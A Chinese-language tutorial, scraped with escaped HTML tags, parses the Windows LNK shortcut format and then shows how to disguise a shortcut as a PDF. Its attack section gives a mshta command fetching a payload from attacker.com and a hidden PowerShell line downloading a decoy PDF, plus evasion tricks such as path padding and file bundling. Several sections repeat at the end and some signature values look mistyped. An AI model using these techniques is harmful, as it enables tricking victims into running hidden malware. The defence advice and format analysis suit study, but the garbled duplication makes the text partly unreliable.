LNK文件格式解析及伪装技术详解<\/h1>

0x01 LNK文件格式解析<\/h2>

文件基本结构<\/h3>

LNK文件前20字节固定不变：<\/p>

HeaderSize<\/strong>(4 bytes, offset 0x00)：固定值0x0000004C<\/li>
LinkCLSID<\/strong>(16 bytes, offset 0x04)：固定GUID值00021401-0000-0000-C000-000000000046<\/li> <\/ul>
0x01.1 LinkFlags<\/h3>
从offset 0x14开始的4字节为LinkFlags，示例值为0x000802DB，表示以下标志被设置：<\/p>

HasLinkTargetIDList<\/li>
HasLinkInfo<\/li>
HasRelativePath<\/li>
HasWorkingDir<\/li>
HasIconLocation<\/li>
IsUnicode<\/li>
HasExpIcon<\/li>
DisableLinkPathTracking<\/li> <\/ul>
0x01.2 FileAttributes<\/h3>
从offset 0x18开始的4字节为FileAttributes，0x00000020表示FILE_ATTRIBUTE_ARCHIVE。<\/p>
0x01.3 时间戳<\/h3>
从offset 0x1C开始，每个时间戳占8字节：<\/p>

CreateTime<\/li>
AccessTime<\/li>
WriteTime<\/li> <\/ul>
0x01.4 FileSize<\/h3>
从offset 0x34开始的4字节表示文件大小，示例值为0x000E0400。<\/p>
0x01.5 IconIndex<\/h3>
从offset 0x38开始的4字节表示图标索引，示例值为0x00000001。<\/p>
0x01.6 ShowCommand & Hotkey<\/h3>
从offset 0x3C开始：<\/p>

ShowCommand(4 bytes)：0x00000001表示SW_SHOWNORMAL<\/li>
Hotkey(2 bytes)<\/li>
保留位(10 bytes)<\/li> <\/ul>
0x01.7 LinkTargetIDList<\/h3>
当HasLinkTargetIDList标志设为1时，文件包含此结构：<\/p>

IDListSize<\/strong>(2 bytes)：表示IDList总大小<\/li>
IDList<\/strong>：由多个ItemID组成<\/li>
TerminalID<\/strong>(2 bytes)：全0作为结束标志<\/li> <\/ul>
每个ItemID结构：<\/p>

ItemIDSize(2 bytes)<\/li>
Data(可变长度)<\/li> <\/ul>
0x01.8 LinkInfo<\/h3>
当HasLinkInfo标志设为1时，文件包含此结构：<\/p>

LinkInfoSize(4 bytes)<\/li>
LinkInfoHeaderSize(4 bytes)：固定值0x0000001C<\/li>
LinkInfoFlags(4 bytes)：0x00000001表示VolumeIDAndLocalBasePath<\/li>
VolumeIDOffset(4 bytes)<\/li>
LocalBasePathOffset(4 bytes)<\/li>
CommonNetworkRelativeLinkOffset(4 bytes)<\/li>
CommonPathSuffixOffset(4 bytes)<\/li>
VolumeID结构(包含DriveType、DriveSerialNumber等)<\/li>
LocalBasePath(指向链接目标的完整路径)<\/li>
CommonPathSuffix<\/li> <\/ul>
0x01.9 String Data<\/h3>
包含多个字符串结构，每个结构包含：<\/p>

CountCharacters(Unicode字符串长度)<\/li>
String(实际字符串内容)<\/li> <\/ul>
根据LinkFlags可能包含：<\/p>

RELATIVE_PATH字符串<\/li>
WORKING_DIR字符串<\/li>
ICON_LOCATION字符串<\/li> <\/ul>
0x01.10 EnvironmentVariableDataBlock<\/h3>
当HasExpString标志设为1时，文件包含此结构：<\/p>

BlockSize(4 bytes)：固定值0x0314<\/li>
BlockSignature(4 bytes)：固定值0xA0000001<\/li>
TargetAnsi(260 bytes)：ANSI格式环境变量路径<\/li>
TargetUnicode(520 bytes)：Unicode格式环境变量路径<\/li> <\/ul>
0x01.11 EXTRA_DATA<\/h3>
由多个数据块组成，可能包含：<\/p>

SpecialFolderDataBlock：<\/p>

BlockSize(4 bytes)<\/li>
BlockSignature(4 bytes)：0xA000005<\/li>
SpecialFolderID(4 bytes)<\/li>
Offset(4 bytes)<\/li> <\/ul> <\/li>

KnownFolderDataBlock：<\/p>

BlockSize(4 bytes)<\/li>
BlockSignature(4 bytes)：0xA00000B<\/li>
KnownFolderID(16 bytes)<\/li>
Offset(4 bytes)<\/li> <\/ul> <\/li>

PropertyStoreDataBlock：<\/p>

BlockSize(4 bytes)<\/li>
BlockSignature(4 bytes)：0xA000009<\/li>
PropertryStore(492 bytes)<\/li> <\/ul> <\/li>

TrackerDataBlock：<\/p>

BlockSize(4 bytes)<\/li>
BlockSignature(4 bytes)：0xA000003<\/li>
Length(4 bytes)<\/li>
Version(4 bytes)<\/li>
MachineID(16 bytes)<\/li>
Droid(32 bytes)<\/li>
DroidBirth(32 bytes)<\/li> <\/ul> <\/li> <\/ol>
0x02 构造迷惑性LNK文件<\/h2>
0x02.1 修改图标<\/h3>

找到ICON_LOCATION字符串部分<\/li>
修改为伪装的扩展名（如".\1.pdf"）<\/li>
调整Unicode字符串长度（如0x07）<\/li> <\/ol>
效果：LNK文件显示为PDF图标，但实际执行的是其他程序。<\/p>
0x02.2 修改目标<\/h3>

修改EnvironmentVariableDataBlock中的TargetAnsi和TargetUnicode

改为%windir%\system32目录下不存在的EXE文件名<\/li> <\/ul> <\/li>
修改LinkTargetIDList中对应的ItemID

确保实际指向有效程序（如calc.exe）<\/li> <\/ul> <\/li> <\/ol>
效果：文件显示为PDF图标，但实际执行计算器程序。<\/p>
0x03 扩展利用技术<\/h2>
高级攻击向量<\/h3>

创建指向mshta.exe的快捷方式<\/li>
修改参数为HTA下载地址：
mshta.exe http:\/\/attacker.com\/payload.hta <\/code><\/pre> <\/li> 在HTA payload前添加PDF打开逻辑： Dim open_pdf Set open_pdf = CreateObject("Wscript.Shell") open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http:\/\/192.168.3.27:8080\/1.pdf',$env:temp+'\LNK文件格式解析(修改版).pdf');Start-Process $env:temp'\LNK文件格式解析(修改版).pdf'", 0, true <\/code><\/pre> <\/li> <\/ol> 增强隐蔽性技巧<\/h3> 在WORKING_DIR字符串前添加大量空格使目标路径长度超过260个字符<\/li> <\/ul> <\/li> 使用copy \/B命令将LNK与正常PDF捆绑增加文件大小可信度<\/li> <\/ul> <\/li> 修改图标为系统图标库中的常见图标<\/li> <\/ol> 最终效果：受害者看到PDF文档正常打开，同时恶意代码在后台执行。<\/p> 防御建议<\/h2> 禁用LNK文件的自动执行<\/li> 显示已知文件扩展名<\/li> 对可疑LNK文件进行静态分析<\/li> 监控异常进程创建行为<\/li> 使用应用程序白名单机制<\/li> <\/ol>

LNK文件格式解析及伪装技术详解<\/h1>

0x01 LNK文件格式解析<\/h2>

0x01.2 FileAttributes<\/h3> 从offset 0x18开始的4字节为FileAttributes，0x00000020表示FILE_ATTRIBUTE_ARCHIVE。<\/p>

0x01.4 FileSize<\/h3> 从offset 0x34开始的4字节表示文件大小，示例值为0x000E0400。<\/p>

0x01.5 IconIndex<\/h3> 从offset 0x38开始的4字节表示图标索引，示例值为0x00000001。<\/p>

0x02 构造迷惑性LNK文件<\/h2>

0x03 扩展利用技术<\/h2>

防御建议<\/h2> 禁用LNK文件的自动执行<\/li> 显示已知文件扩展名<\/li> 对可疑LNK文件进行静态分析<\/li> 监控异常进程创建行为<\/li> 使用应用程序白名单机制<\/li> <\/ol>

0x01.2 FileAttributes<\/h3>
从offset 0x18开始的4字节为FileAttributes，0x00000020表示FILE_ATTRIBUTE_ARCHIVE。<\/p>

0x01.4 FileSize<\/h3>
从offset 0x34开始的4字节表示文件大小，示例值为0x000E0400。<\/p>

0x01.5 IconIndex<\/h3>
从offset 0x38开始的4字节表示图标索引，示例值为0x00000001。<\/p>

防御建议<\/h2>

禁用LNK文件的自动执行<\/li>
显示已知文件扩展名<\/li>
对可疑LNK文件进行静态分析<\/li>
监控异常进程创建行为<\/li>
使用应用程序白名单机制<\/li> <\/ol>